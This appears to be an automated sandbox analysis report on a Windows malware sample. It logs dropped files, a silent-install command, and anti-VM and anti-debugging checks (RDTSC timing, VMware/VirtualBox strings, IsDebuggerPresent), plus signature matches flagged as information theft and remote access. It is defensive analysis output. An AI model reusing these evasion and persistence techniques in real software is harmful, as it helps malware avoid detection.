                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Section loaded: OutputDebugStringW count: 1841
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe RDTSC instruction interceptor: First address: 69B27E second address: 69B284 instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe RDTSC instruction interceptor: First address: 69B284 second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F824CC64296h 0x00000006 sub eax, ebx 0x00000008 mov dword ptr [ebp-04h], eax 0x0000000b mov ecx, 0000000Ah 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe RDTSC instruction interceptor: First address: 69B294 second address: 69B29A instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe RDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F824CC64296h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F824CC642A5h 0x0000000d dec ecx 0x0000000e jne 00007F824CC64289h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe RDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F824CC64296h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F824CC642A5h 0x0000000d mov dword ptr [ebp-04h], eax 0x00000010 dec ecx 0x00000011 jne 00007F824CC64289h 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Window / User API: threadDelayed 3592
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libeay32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-GPS00.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-SNDPS.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-S3CIC.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\astclient.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libcryptoMD.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-BG0DN.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-JCRD8.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libcurl.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\opus.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\astrct.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-MU1HO.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\msvcr120.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libjpeg-turbo-win.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libcryptoMD.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\aw_sas32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-VO31B.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libcurl.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\hatls.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libjpeg-turbo-win.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libeay32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-E6DJ2.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy)
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe API coverage: 2.8 %
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe File opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 11_3_070025DB FindFirstFileA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 11_2_070025DB lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose
                          Source: is-TBGHD.tmp.4.dr Binary or memory string: VMware
                          Source: is-TBGHD.tmp.4.dr Binary or memory string: VBoxService.exe
                          Source: aeyh21MAtA.tmp, 00000001.00000002.2083863637.000000000063C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: aeyh21MAtA.tmp, 00000001.00000002.2083863637.000000000063C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%
                          Source: is-TBGHD.tmp.4.dr Binary or memory string: VMWare
                          Source: ast.exe, 0000000B.00000002.2862003498.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2941388188.0000000000D8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: is-TBGHD.tmp.4.dr Binary or memory string: VBoxService.exeU
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Process information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7CEFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7AAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7CC43E mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7D1C01 mov eax, dword ptr fs:[00000030h]10_2_6B7D1C01
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_07001E1D mov edi, dword ptr fs:[00000030h]11_3_07001E1D
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CEFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B7CEFE1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7BDC3A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6B7BDC3A
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxcJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe" Jump to behavior
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWndSVW
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWnd
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWndTrayNotifyWndSV
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CFBD1 GetSystemTimeAsFileTime,10_2_6B7CFBD1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_070021FF GetUserNameA,11_3_070021FF
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: ast.exe, ast.exe, 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: PROCEXP.EXE

                          Stealing of Sensitive Information

                          Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 10_2_6B7A6D50 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,curl_msnprintf,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 10_2_6B7739A0 curl_pushheader_bynum,inet_pton,htons,inet_pton,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 10_2_6B77EEA0 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,inet_pton,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,curl_pushheader_bynum,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E168FD sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E283DC sqlite3_bind_blob64
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E283B5 sqlite3_mutex_leave,sqlite3_bind_blob
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E285E9 sqlite3_bind_zeroblob,sqlite3_mutex_leave
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E095A5 sqlite3_bind_parameter_index
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E285B8 sqlite3_bind_null,sqlite3_mutex_leave
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E03587 sqlite3_bind_parameter_name
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe | Code function: 11_2_61E28592 sqlite3_bind_int,sqlite3_bind_int64
